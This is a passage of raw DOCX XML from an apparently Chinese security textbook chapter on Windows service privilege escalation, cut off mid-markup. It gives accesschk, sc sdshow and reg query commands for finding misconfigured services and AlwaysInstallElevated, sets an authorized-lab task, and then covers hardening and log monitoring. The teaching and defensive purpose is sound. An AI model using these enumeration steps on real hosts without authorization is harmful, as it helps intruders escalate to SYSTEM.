        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysinternals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accesschk.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（或PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本）来检查服务权限配置。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accesschk.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为微软官方发布的排障与安全审计工具，在授权靶场使用是标准的②。命令为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accesschk.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-ucqv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或者直接检查所有用户都有写权限的服务：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accesschk.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-uwcqv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Authenticated Users"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令解释：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">禁止错误，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查服务，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">省略标题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">详细输出。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果看到某个服务后跟有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVICE_CHANGE_CONFIG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVICE_ALL_ACCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，且该服务以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LocalSystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行，则该服务即是一个高度可能的提权点。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accesschk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并非内置命令，靶机可能没有。此时可以尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的自定义脚本枚举，或利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sc sdshow &lt;SERVICE_NAME&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令查看服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SDDL（安全描述符定义语言）字符串，并通过解读其中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串来判断低权限用户是否被授予了修改权限。例如，若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SDDL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串中出现了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BU)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，则代表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Built-in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Users）组拥有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Children）等修改权限①，这是可被利用的强信号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤四：检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> AlwaysInstallElevated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注册表项</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的策略最终会映射到注册表中。您可以通过检查两个特定的注册表键值来确认该漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AlwaysInstallElevated</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果两条命令的返回值都是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(REG_DWORD)，则代表该主机存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AlwaysInstallElevated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞。如果其中任何一个键不存在或值为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，则无法利用此方法提权。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：权限不足访问注册表项通常意味着需要手动确认。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在获得授权的靶机上，重复上述枚举流程。首先标记出所有能被当前用户停启或修改的服务，再仔细检查哪些服务是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①不带引号且路径可写的，②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">给予了当前用户修改权限的，③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属于非微软服务的。将观察到的每一项配置缺陷与上述三种原理进行对应，并思考防御侧的修复顺序。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="293"/>
    <w:bookmarkStart w:id="294" w:name="防御纵深服务配置加固的整体框架"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御纵深：服务配置加固的整体框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上攻击方法的共同点是利用了系统管理者在“服务”这个攻击面上的配置疏忽。为了防御这类提权，蓝队和安全管理员应采取一套纵深防御框架，而不仅仅是“打补丁”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务权限基线化与加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用微软安全合规工具包（Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Security Compliance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Toolkit）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CIS（Center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）基准为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务建立安全配置基线。该基线明确规定，所有以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行的服务，其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVICE_CHANGE_CONFIG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限必须仅限于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BUILTIN\Administrators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在企业环境中，使用组策略（GPO）强制执行基准。任何将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticated Users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加入关键服务修改权限的配置变更都应被组策略立即覆盖纠正。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. AlwaysInstallElevated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的强制禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组策略对象中，应确保“用户配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Installer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”被明确设置为“已禁用”（或在未配置状态下，但其对应的注册表项</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HKCU</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径不应被管理员通过脚本推送为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1）。仅在企业确实需要推送受信任</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MSI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，才严格在“计算机配置”中启用，并配合应用白名单限制可获得提升的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MSI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补丁管理与日志监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然配置错误是主要攻击入口，但低权限用户可能通过枚举发现一个过期的内核漏洞（详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">15.2，概念一致）来直接获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限。因此，建立严格的补丁管理周期是防御提权的基石。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控关键日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：必须集中采集和分析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全事件日志。关键的提权检测事件包括：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 7045 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4697</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（系统中安装了新服务）。若新服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ImagePath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指向用户临时目录（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\&lt;USER&gt;\AppData\Local\Temp\*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
